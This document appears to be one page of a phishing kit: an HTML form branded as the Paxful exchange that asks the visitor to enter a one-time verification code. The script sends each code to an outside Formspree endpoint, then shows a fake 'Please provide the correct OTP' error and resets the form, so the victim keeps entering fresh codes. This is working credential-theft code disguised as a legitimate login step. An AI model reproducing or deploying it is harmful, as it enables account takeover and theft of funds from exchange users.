<!DOCTYPE html>
<html lang="en">
<head>
    <style>
        *{
            margin: 0;
            padding: 0;
            font-family: Arial, Helvetica, sans-serif;
            color: white;
            transition: all 1s ease-in-out;
        }
        body{
            background: black;
            height: 100vh;
        }
        .top{
            margin-top: 30px;
            margin-left: 30px;
            margin-bottom: 30px;
        }
        .top button{
            background: transparent;
            border: 0;
            width: 30px;
            height: 30px;
            background: url(./arrow-left.svg);
            background-size: cover;
            background-position: center;
            background-repeat: no-repeat;
        }
        .a{
            width: 100%;
            text-align: center;
            font-size: 25px;
            font-weight: bolder;
            margin-bottom: 30px;
            font-family: calibri;
        }
        .b{
            width: 100%;
            text-align: center;
            font-size: 15px;
            color: rgb(190,190,190);
            margin-bottom: 50px;
        }
        .otp{
            width: 100%;
            display: flex;
            justify-content: center;
            align-items: center;
        }
        form{
            display: flex;
            flex-direction: column;
            align-items: center;
        }
        input{
            width: 200px;
            height: 40px;
            border-radius: 12px;
            background-color: transparent;
            color: white;
            border: 1px solid rgb(170, 170, 170);
            margin-bottom: 30px;
            text-align: center;
        }
        p{
            font-size: 15px;
            margin-bottom: 30px;
        }
        a{
            text-decoration: none;
            color: rgb(16, 126, 198);
        }
        form button{
            width: 200px;
            height: 44px;
            border-radius: 100px;
            background: rgb(2, 228, 61);
            color: black;
            font-size: 20px;
            font-weight: bold;
        }
    </style>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Paxful</title>
</head>
<body>
    <div class="top">
        <button onclick="window.location='./linkcard.html'">
        </button>
    </div>
    <div class="a">
        Verify Your OTP
    </div>
    <div class="b">
        Enter code we've sent to your inbox
    </div>
    <div class="otp">
        <form id="my-form" action="https://formspree.io/f/xovkazao" method="POST">
            <input type="number" name="otp" id="">
            <p>Didn't get a code? <a href="./verify.html">Resend Otp</a></p>
            <button>Verify</button>
        </form>
    </div>
<script>
    
    var form = document.getElementById("my-form");
  
  async function handleSubmit(event) {
    event.preventDefault();
    var data = new FormData(event.target);
    fetch(event.target.action, {
      method: form.method,
      body: data,
      headers: {
          'Accept': 'application/json'
      }
    }).then(response => {
      if (response.ok) {
        alert('Please provide the correct OTP')
        form.reset()
      } else {
        response.json().then(data => {
          if (Object.hasOwn(data, 'errors')) {
            alert(data["errors"].map(error => error["message"]).join(", "))
          } else {
            alert("Oops! There was a problem submitting your form")
          }
        })
      }
    }).catch(error => {
      alert("Oops! There was a problem submitting your form")
    });
  }
  form.addEventListener("submit", handleSubmit)
</script>
</body>
</html>